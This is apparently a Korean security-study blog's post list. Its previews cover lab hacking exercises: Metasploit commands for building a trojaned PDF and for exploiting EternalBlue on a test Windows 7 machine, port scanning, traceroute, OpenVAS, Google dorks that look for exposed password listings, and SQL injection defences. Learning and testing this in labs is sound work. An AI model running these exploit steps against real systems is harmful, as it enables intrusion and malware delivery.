프로그램 취약점 공격 실습 +keylog
·
Hacking
실제상황XX프로그램 취약점을 이용한 공격 > pdf 파일에 백도어를 설치해 트로이목마를 심어볼 예정 취약점이 있는 프로그램을 클라이언트측에 설치 msfconsole 들어가기 위 도구는 악성코드로 파일을 만들어줌. use exploit/windows/fileformat/adobe_utilprintf set filename test1.pdfset lport 4455exploit exitcd /root/.msf4 ~~ 경로로 이동 후 파일 압축하기 gzip test1.pdfmv /root/Desktop 파일이 다른 가상머신으로 옮겨지지 않는 경우 아래 설치apt -y install open-vm-tools open-vm-tools-desktop 클라이언트에 파일 옮기고 칼리에서 포트를 여는 도구를 사용한..
OPEN VAS를 이용한 취약점 분석 > green bone
·
Hacking
gvm-setupgvm-check-setuphttps://127.0.0.1:9392설치하는데 굉장히 오래 걸린다~~feed status를 확인해보면 전부 current가 되어야 완료된 것이다. 취약점 정보확인 NVTs : 아래 세개를 합쳐서 스크립트를 만든 것 네트워크 취약점을 점검할 때 사용할 코드, 스크립트 실제로 취약점을 검사하는 스크립트의 집합 - open vas회사에서 만든 것: GVM에서 만들었음 .green bone. (이건 회사마다 다르겠지만 난 무료 버전을 쓰니까 그 기준으로) CVEs : 취약점 공개된 취약점을 리스트로 정리해 주는 사이트 https://www.cve.org/CVERecord/들어가서 원하는 시스템을 검색하면 해당 취약점이 발견된 연도와 해당 취약점이 발견된 순서 이게..
Metasploit을 이용한 eternalblue 취약점 공격
·
Hacking
2017년도 발생한 워너크라이 랜섬웨어 > Microsoft Windows를 사용하는 컴퓨터를 대상으로 하는 랜섬웨어.보다 강력한 취약점.eternalblue 테스트를 위해 win 7 설치 후 진행 msfconsolesearch ms17_010use 0use exploit/windows/smb/ms17_010_eternalblueshow optionsset rhosts 192.168.50.60exploit ? 검색 후 원하는 공격 선택 화면 실시간 확인 파일 업로드 다운로드파일 삭제등 다양한 것들이 가능
Metasploit 사용
·
Hacking
metasploit 실행 전 업데이트▪ apt-get clean▪ apt-get -y update 실행msfconsole metasploit에서 실행 가능한 exploit(공격 방법) 검색▪ search portscan use 번호 or use auxiliary/scanner/portscan/use 6 set rhosts 192.168.50.50set ports 1-500 half of scanning (rst바로 날림) exploit공격결과 Metasploit msfconsole search portscan use 6 or use auxiliary/scanner/portscan/syn options set rhosts 192.168.50.50 exploit 실행 apt-get install Post..
scaning(Active Host Scanning, Port Scanning)
·
Hacking
*제한된 환경에서 실습 진행* 탐색(Scan, Scanning)- Footprint 단계에서 수집한 정보의 사실 유무 확인 및 누락된 정보확인- 대상시스템에 직접적으로 데이터를 전송하여 확인함 종류Active Host Scanning → 실제 동작중인 시스템 식별- Active Host Scanning 종류- ICMP echo ping : ICMP 메시지를 이용하여 동작중인 호스트를 식별하는 방식- ARPing : ARP 패킷을 이용하여 동작중인 호스트를 식별하는 방식- TCP ping : TCP 패킷을 이용하여 동작중인 호스트를 식별하는 방식+ ack scan- UDP ping : UDP 패킷을 이용하여 동작중인 호스트를 식별Port Scanning → 동작중인 시스템에서 제공하는 서비스 식별- UDP..
경로추적
·
Hacking
경로추척공격자 입장에서 공격하고자 하는 타겟에게 접근하는 상황에 어떤 장비를 지나가야 하는 지 파악해야 하는 경우어떤 네트워크 장비가 있는지 어떤 보안 솔루션이 있는지 등 타겟과 통신을 진행하는 상황의 경로를 파악해야 함 ip protocal의 TTL값을 조정해 알아내는 방식처음에는 1로 설정해 보내고 점차 1씩 증가해 보냄으로써 TTL만료로 발생하는 오류메시지를 통해 중간 경로상 장비를 파악하는 것으 목적으로 한다.TTL값이 0이 되는 위치에서 오류메시지를 보내준다. 0이 되게 1로 보내면 첫번째 장비에서 오류메시지를 보내줄거고 2로 보내면 그 다음 장비에서 다시 나에게 돌아와 오류메시지를 보내줄 것, 따라서 계속 하나씩 늘려 보내다보면 내가 원하는 목적지까지의 장비갯수와 각 장비의 ip주소, 통신 속..
Footprinting - Domain 정보 수집
·
Hacking
보호되어 있는 글입니다.
파일 다운로드&업로드 취약점 및 보안
·
Hacking
보호되어 있는 글입니다.
google dork 연산자 및 옵션
·
Hacking
검색할 때 자세히 검색할 줄 알면 더 좋은 정보를 얻을 수 있다. 📚 구글 검색 연산자 및 옵션 정리 intitle:제목에 특정 단어가 포함된 페이지 검색intitle:검색어intitle:"security vulnerability"페이지 제목에 "security vulnerability"가 포함된 결과를 검색allintitle:제목에 여러 단어가 모두 포함된 페이지 검색allintitle:검색어1 검색어2allintitle:"index of" "passwords"제목에 "index of"와 "passwords"가 모두 포함된 결과를 검색intext:본문에 특정 단어가 포함된 페이지 검색intext:검색어intext:"confidential"본문에 "confidential"이 포함된 페이지 검색site..
sql injection 보안 , Directory listing 취약점 및 보안
·
Hacking
1. 안전한 로직 Prepared Statements (또는 Parameterized Queries) 사용-SQL 문에 사용될 값을 쿼리 문자열과 분리하여 처리,사용자의입력이 쿼리 구조 자체를 바꾸지 못하도록 차단함입력값 검증 및 이스케이프 처리 (Input Validation & Escaping)2. server side validationDBMS로 전달되는 사용자의 입력 값을 검증한 후 전달 함공격에 사용되는 메타문자 필터링 -> ;, ", --, # 등공백 필터링 -> trim()으로 공백 제거공격에 사용되는 SQLcommamd 필터링 -> select, insert, delete, update 등등 addslashes 함수사용: 이스케이프할 문자열=mysql_real_escape_string 함수..